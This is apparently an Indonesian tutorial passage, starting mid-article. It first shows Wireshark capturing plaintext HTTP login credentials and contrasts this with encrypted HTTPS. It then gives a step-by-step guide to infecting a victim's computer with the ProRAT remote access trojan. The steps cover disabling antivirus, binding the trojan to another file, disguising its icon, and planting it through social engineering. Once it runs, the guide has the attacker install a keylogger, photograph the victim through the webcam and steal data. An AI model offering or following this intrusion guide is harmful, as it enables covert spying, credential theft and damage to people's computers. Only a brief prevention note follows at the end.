Dan kemudian data berhasil ditangkap oleh BadGuy menggunakan Wireshark dengan Username: niceguy@yahuu.com dan password: heremypass.
Kesimpulan HTTP
Data paket yang dikirim menggunakan HTTP tidak terenkripsi, siapapun dapat melihat data dalam teks biasa seperti BadGuy lakukan. Itulah mengapa tidak menggunakan HTTP untuk perbankan atau transaksi di internet, dan juga itu tidak dianjurkan jika Anda membuka website halaman login yang menggunakan HTTP pada jaringan publik seperti area hotspot nirkabel.

HTTPS

HTTPS adalah kombinasi dari Hyper Text Transfer Protocol dan Secure Socket Layer protokol (SSL) / Transport Layer Security (TLS) untuk menyediakan komunikasi terenkripsi antara web server dan klien. Biasanya HTTPS digunakan untuk internet banking, transaksi pembayaran, halaman login, dll
Protokol ini menggunakan port 443 untuk komunikasi. Website yang sudah menggunakan protokol ini GMail.com, dan juga situs-situs lain seperti PayPal, Amazon, dll.
Mari kita lihat hubungan antara komputer kita dan web server ketika kita membuat koneksi menggunakan HTTPS menggunakan netstat-an.

Seperti yang bisa kita lihat dari gambar, komputer klien membuka port lokal acak dan port terbuka 443 pada sisi server.
Apakah HTTPS (Hyper Text Transfer Protocol Secure) Aman?
Untuk menjawab pertanyaan ini, mari kita lihat eksperimen di bawah ini. Dalam percobaan ini, ada 2 orang dalam satu jaringan nirkabel dan BadGuy NiceGuy.
NiceGuy mencoba untuk membuka http://gmail.com kemudian login ke dalamnya. Di tempat berbeda, BadGuy dalam jaringan nirkabel yang sama dengan NiceGuy seperti yang ditunjukkan pada gambar di bawah:

Ketika BadGuy mencoba untuk menangkap data paket semua untuk / dari titik akses, maka akan berbeda bila menggunakan koneksi HTTPS untuk NiceGuy.
Untuk keterangan lebih jelas, mari kita lihat gambar di bawah ini ketika Input NiceGuy username dan password pada halaman login Gmail.

Seperti yang dapat Anda lihat dalam gambar di atas, itu menggunakan https untuk koneksi antara klien dan server web. Kemudian kita akan melihat apa yang BadGuy lakukan setelah NiceGuy menggunakan HTTPS untuk koneksi nya.
BadGuy menyukai tools seperti Wireshark, jadi dia mencoba lagi untuk menangkap data dan berharap ada sesuatu yang menarik di sana.

BadGuy tidak menemukan data polos, setiap data kirim ke / mengirim dari server dienkripsi. Gambar di atas adalah informasi login (mungkin) data yang telah ditangkap oleh BadGuy, tapi saya pikir BadGuy tidak dapat mematahkan data dienkripsi hanya dalam beberapa hari / bulan / tahun atau mungkin kita bisa disebut “tidak mungkin” (kita masih tidak tahu kapan waktu yang mungkin untuk masuk ke dalamnya).
Kesimpulan HTTPS
Data paket dikirim menggunakan HTTPS dienkripsi, orang tidak dapat melihat data paket dalam jaringan publik. Itu sebabnya HTTPS biasanya digunakan untuk perbankan atau transaksi di internet, dan halaman juga login atau halaman lain perlu untuk mengenkripsi data.
Semoga memperjelas kita semua

Hacking with ProRAT

Tools buatan orang Turkey ini sangat luar biasa, tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban, maka kita dapat langsung menginfeksinya.
A. Cara penggunaan ProRat
1. Pertama kali kita harus mengetahui terlebih dahulu IP dan Port korban yang terbuka. Kita dapat melakukannya dengan cara manual atau juga dengan bantuan Ports Scanner.

Dari gambar diatas kita mengetahui semua IP komputer yang aktif dan Port mana saja yang terbuka. Yang akan dijadikan korban pada percobaan kita kali ini adalah komputer dengan IP 192.162.10.233.
2. Langkah selanjutnya yaitu kita jalankan ProRat, tools ini dapat di download di http://www.prorat.net . Sebelumnya matiin dulu Anti Virus kamu (disable), karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi komputer kita. Setelah itu isikan IP korban pada form IP dan Portnya (default 5110).

Apabila kita klik tombol Connect maka koneksi ke komputer korban belum bisa, karena komputer korban belum kita infeksi. Untuk menginfeksi komputer korban kita terlebih dahulu membuat server yang akan dijalankan pada komputer korban. Caranya klik tombol Create – Create Prorat Server. Lalu muncul tampilan Notifications :

Centang pilihan Use Proconnective Notifications dan isi IP(DNS)Address dengan IP kita. Pada tab General Setting kita isikan Server Port (default 5110), Server Password dan Victim Name.

Pada tab Bind with File kita dapat menyusupkan file yang akan dijalankan bersama Server. Extensi file bebas.

Selanjutnya adalah tab Server Extension, ada beberapa pilihan extensi server. Kita pilih yang berekstensi .Exe.

Untuk membuat icon server kita klik tab Server Icon, pilih icon apa saja yang kamu inginkan.

Langkah terakhir dari pembuatan server ini adalah klik Create Server.

Setelah berhasil, akan tampil :

3. Kita tinggal menjalankan Server tersebut dikomputer korban. Caranya terserah kamu… mau disusupkan diam-diam atau memakai teknik Social Engineering dan juga dapat kamu infeksikan langsung pada komputer tersebut (kalo bias sihh).
4. Setelah Server tersebut berhasil berjalan pada komputer korban, maka kita langsung mencoba mengkoneksikannya dengan komputer kita.
5. Untuk koneksi kita dapat menggunakan ProConnective atau langsung mengetikkan IP address dan Port komputer korban. ProConnective adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi) antara komputer server dan komputer client (korban). Akan nampak IP korban apabila dia sedang on.

6. Setelah berhasil melakukan koneksi ke komputer korban maka status dari ProRat akan berubah dari Disconnected ke Connected

7. Nah…saatnya kita bermain. Ada banyak hal yang dapat kita lakukan pada komputer korban seperti mengetahui informasi dari PC, mengirimkan pesan error, mematikan komputer, mengunci mouse, membuka CD-ROM atau bahkan memotret wajah korban .
8. Sekarang kita akan melihat PC info korban :

Dari gambar diatas kita dapat melihat informasi yang dimiliki dari komputer korban.
9. Kita juga dapat mengirimkan pesan error palsu ke komputer korban :

10. Memasang Keylogger.

11. Dan yang paling seru adalah melihat wajah dari korban yang kita hack.

Bagaimana seru kan? Itu masih sebagian kecil dari kegunaan ProRat masih banyak lagi fungsi lainnya, seperti memformat hardisk milik korban, mengacaukan registry, mencuri data-data penting dan lain sebagainya. Akan tetapi, dalam pembahasan kita kali ini kita cukupkan sekian saja ya. Ok !
Gunakan dengan baik ya…
B. Cara Pencegahan
1. Update selalu Anti Virus anda agar mampu mendeteksi adanya infeksi dari ProRat. Biasanya server ProRat terdeteksi sebagai
Trojan.Dropper.Prorat.DZ.29, Dropped:Backdoor.Prorat.DZ.
2. Pasanglah Anti Prorat, anda bisa mendownloadnya di www.softpedia.com/get/Antivirus/Anti-prorat.shtml.
Selamat mencoba…